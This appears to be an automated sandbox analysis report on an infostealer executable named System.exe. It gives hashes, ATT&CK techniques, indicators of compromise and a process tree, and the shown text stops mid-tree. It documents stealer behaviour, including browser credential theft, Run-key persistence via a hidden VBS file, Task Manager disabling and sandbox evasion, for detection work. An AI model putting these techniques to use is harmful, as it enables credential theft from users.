af277117f93fbe518b20b27504d9607df8389027daa848178dcf24355b33bd82

Analysis

max time kernel
153s
max time network
167s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
15/03/2024, 21:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

System.exe
Size

158.3MB
MD5

2fc619804ddd0e6a29f768292822d6d6
SHA1

d43152e0c3f040a59a07d1b494d80361d904d7c9
SHA256

994eaeba18456e8337729eb62403048c69289af5c0c5a01e129ab088c39765d0
SHA512

c6705b4bc2a2dd233fc564694a87811a4e9e58eccef0000ef2598f90fa62149a29232d64819af4c406557d358bd3c2b2f4d9458245593d7a920301688638daff
SSDEEP

1572864:UatFKZwMtLYWQwZOTACYItd+qy9YN6yxL+a6ZqbZX5OG+hJfROyOe/FkCX3cIwvI:viQ08xye4

Score

8^/10

evasion persistence spyware stealer

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Loads dropped DLL 2 IoCs

pid	Process
4788	System.exe
4788	System.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows\CurrentVersion\Run\Start_QHBteN = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_QHBteN.vbs"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
26	raw.githubusercontent.com
28	raw.githubusercontent.com
37	raw.githubusercontent.com
24	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ipinfo.io
12	ipinfo.io

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	System.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
11060	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
7660	tasklist.exe
8228	tasklist.exe
8208	tasklist.exe
8100	tasklist.exe
7860	tasklist.exe
7040	tasklist.exe
7572	tasklist.exe
7832	tasklist.exe
7824	tasklist.exe
7564	tasklist.exe
7644	tasklist.exe
8188	tasklist.exe
8008	tasklist.exe
7924	tasklist.exe
6396	tasklist.exe
7500	tasklist.exe
7520	tasklist.exe
7508	tasklist.exe
7956	tasklist.exe
8200	tasklist.exe
8172	tasklist.exe
7804	tasklist.exe
7328	tasklist.exe
7432	tasklist.exe
8292	tasklist.exe
8084	tasklist.exe
7908	tasklist.exe
7736	tasklist.exe
7628	tasklist.exe
7468	tasklist.exe
5708	tasklist.exe
8284	tasklist.exe
8376	tasklist.exe
8156	tasklist.exe
8060	tasklist.exe
7900	tasklist.exe
7592	tasklist.exe
7544	tasklist.exe
7964	tasklist.exe
6116	tasklist.exe
7452	tasklist.exe
7652	tasklist.exe
7636	tasklist.exe
8076	tasklist.exe
7600	tasklist.exe
7536	tasklist.exe
7528	tasklist.exe
7312	tasklist.exe
7996	tasklist.exe
7892	tasklist.exe
4028	tasklist.exe
7348	tasklist.exe
7980	tasklist.exe
7944	tasklist.exe
7876	tasklist.exe
7868	tasklist.exe
7420	tasklist.exe
8132	tasklist.exe
7668	tasklist.exe
8048	tasklist.exe
7936	tasklist.exe
7056	tasklist.exe
7384	tasklist.exe
8068	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
4788	System.exe
4788	System.exe
4788	System.exe
4788	System.exe
4788	System.exe
4788	System.exe
11152	powershell.exe
11152	powershell.exe
11152	powershell.exe
4160	powershell.exe
4160	powershell.exe
4160	powershell.exe
9784	powershell.exe
9784	powershell.exe
2916	powershell.exe
2916	powershell.exe
6108	powershell.exe
6108	powershell.exe
9784	powershell.exe
2916	powershell.exe
6108	powershell.exe
11204	powershell.exe
11204	powershell.exe
7456	powershell.exe
7456	powershell.exe
1916	powershell.exe
1916	powershell.exe
7664	powershell.exe
7664	powershell.exe
9040	powershell.exe
9040	powershell.exe
6428	powershell.exe
6428	powershell.exe
7756	powershell.exe
7756	powershell.exe
7812	System.exe
7812	System.exe
248	powershell.exe
248	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4788	System.exe
Token: SeCreatePagefilePrivilege	4788	System.exe
Token: SeDebugPrivilege	4028	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2996	WMIC.exe
Token: SeSecurityPrivilege	2996	WMIC.exe
Token: SeTakeOwnershipPrivilege	2996	WMIC.exe
Token: SeLoadDriverPrivilege	2996	WMIC.exe
Token: SeSystemProfilePrivilege	2996	WMIC.exe
Token: SeSystemtimePrivilege	2996	WMIC.exe
Token: SeProfSingleProcessPrivilege	2996	WMIC.exe
Token: SeIncBasePriorityPrivilege	2996	WMIC.exe
Token: SeCreatePagefilePrivilege	2996	WMIC.exe
Token: SeBackupPrivilege	2996	WMIC.exe
Token: SeRestorePrivilege	2996	WMIC.exe
Token: SeShutdownPrivilege	2996	WMIC.exe
Token: SeDebugPrivilege	2996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2996	WMIC.exe
Token: SeRemoteShutdownPrivilege	2996	WMIC.exe
Token: SeUndockPrivilege	2996	WMIC.exe
Token: SeManageVolumePrivilege	2996	WMIC.exe
Token: 33	2996	WMIC.exe
Token: 34	2996	WMIC.exe
Token: 35	2996	WMIC.exe
Token: 36	2996	WMIC.exe
Token: SeShutdownPrivilege	4788	System.exe
Token: SeCreatePagefilePrivilege	4788	System.exe
Token: SeIncreaseQuotaPrivilege	2996	WMIC.exe
Token: SeSecurityPrivilege	2996	WMIC.exe
Token: SeTakeOwnershipPrivilege	2996	WMIC.exe
Token: SeLoadDriverPrivilege	2996	WMIC.exe
Token: SeSystemProfilePrivilege	2996	WMIC.exe
Token: SeSystemtimePrivilege	2996	WMIC.exe
Token: SeProfSingleProcessPrivilege	2996	WMIC.exe
Token: SeIncBasePriorityPrivilege	2996	WMIC.exe
Token: SeCreatePagefilePrivilege	2996	WMIC.exe
Token: SeBackupPrivilege	2996	WMIC.exe
Token: SeRestorePrivilege	2996	WMIC.exe
Token: SeShutdownPrivilege	2996	WMIC.exe
Token: SeDebugPrivilege	2996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2996	WMIC.exe
Token: SeRemoteShutdownPrivilege	2996	WMIC.exe
Token: SeUndockPrivilege	2996	WMIC.exe
Token: SeManageVolumePrivilege	2996	WMIC.exe
Token: 33	2996	WMIC.exe
Token: 34	2996	WMIC.exe
Token: 35	2996	WMIC.exe
Token: 36	2996	WMIC.exe
Token: SeShutdownPrivilege	4788	System.exe
Token: SeCreatePagefilePrivilege	4788	System.exe
Token: SeDebugPrivilege	7040	tasklist.exe
Token: SeDebugPrivilege	5708	tasklist.exe
Token: SeDebugPrivilege	6396	tasklist.exe
Token: SeShutdownPrivilege	4788	System.exe
Token: SeCreatePagefilePrivilege	4788	System.exe
Token: SeDebugPrivilege	7056	tasklist.exe
Token: SeDebugPrivilege	7284	tasklist.exe
Token: SeDebugPrivilege	7088	tasklist.exe
Token: SeDebugPrivilege	7372	tasklist.exe
Token: SeIncreaseQuotaPrivilege	7460	WMIC.exe
Token: SeSecurityPrivilege	7460	WMIC.exe
Token: SeTakeOwnershipPrivilege	7460	WMIC.exe
Token: SeLoadDriverPrivilege	7460	WMIC.exe
Token: SeSystemProfilePrivilege	7460	WMIC.exe
Token: SeSystemtimePrivilege	7460	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4788 wrote to memory of 4160	4788	System.exe	80
PID 4788 wrote to memory of 4160	4788	System.exe	80
PID 4160 wrote to memory of 4028	4160	cmd.exe	82
PID 4160 wrote to memory of 4028	4160	cmd.exe	82
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 2224	4788	System.exe	83
PID 4788 wrote to memory of 1848	4788	System.exe	84
PID 4788 wrote to memory of 1848	4788	System.exe	84
PID 4788 wrote to memory of 1916	4788	System.exe	86
PID 4788 wrote to memory of 1916	4788	System.exe	86
PID 1916 wrote to memory of 2996	1916	cmd.exe	88
PID 1916 wrote to memory of 2996	1916	cmd.exe	88
PID 4788 wrote to memory of 2328	4788	System.exe	89
PID 4788 wrote to memory of 2328	4788	System.exe	89
PID 4788 wrote to memory of 2320	4788	System.exe	91
PID 4788 wrote to memory of 2320	4788	System.exe	91
PID 4788 wrote to memory of 1160	4788	System.exe	92
PID 4788 wrote to memory of 1160	4788	System.exe	92
PID 4788 wrote to memory of 496	4788	System.exe	93
PID 4788 wrote to memory of 496	4788	System.exe	93
PID 4788 wrote to memory of 1544	4788	System.exe	95
PID 4788 wrote to memory of 1544	4788	System.exe	95
PID 4788 wrote to memory of 1524	4788	System.exe	96
PID 4788 wrote to memory of 1524	4788	System.exe	96
PID 4788 wrote to memory of 3088	4788	System.exe	97
PID 4788 wrote to memory of 3088	4788	System.exe	97
PID 4788 wrote to memory of 4664	4788	System.exe	99
PID 4788 wrote to memory of 4664	4788	System.exe	99
PID 4788 wrote to memory of 4420	4788	System.exe	100
PID 4788 wrote to memory of 4420	4788	System.exe	100
PID 4788 wrote to memory of 3892	4788	System.exe	102
PID 4788 wrote to memory of 3892	4788	System.exe	102
PID 4788 wrote to memory of 1548	4788	System.exe	103
PID 4788 wrote to memory of 1548	4788	System.exe	103
PID 4788 wrote to memory of 5020	4788	System.exe	104
PID 4788 wrote to memory of 5020	4788	System.exe	104

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6408	attrib.exe

C:\Users\Admin\AppData\Local\Temp\System.exe
"C:\Users\Admin\AppData\Local\Temp\System.exe"
1⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4028
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1704 --field-trial-handle=1708,i,11472193960638096865,18400825154010540995,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:2224
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --mojo-platform-channel-handle=1740 --field-trial-handle=1708,i,11472193960638096865,18400825154010540995,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  PID:1848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=NaN get ExecutablePath
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2328
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2320
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:5708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1160
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:496
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1544
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1524
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3088
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4664
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4420
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3892
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1548
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5020
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:980
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4284
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4720
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1560
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2100
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4176
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2364
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2416
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4620
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4632
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3112
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4808
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2748
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1136
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2256
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:896
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2396
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2916
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:576
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4672
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2136
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4616
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:424
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4732
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2236
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4312
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3440
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4640
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3688
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2356
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4008
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2660
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5092
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4392
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5068
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2600
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1572
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:7040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3572
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2856
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4016
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2732
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3604
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3884
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3504
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:756
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:6396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2008
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4168
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3484
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5048
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:924
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4924
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:872
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2260
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2180
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4528
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4700
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7812
- C:\Windows\system32\cmd.exe
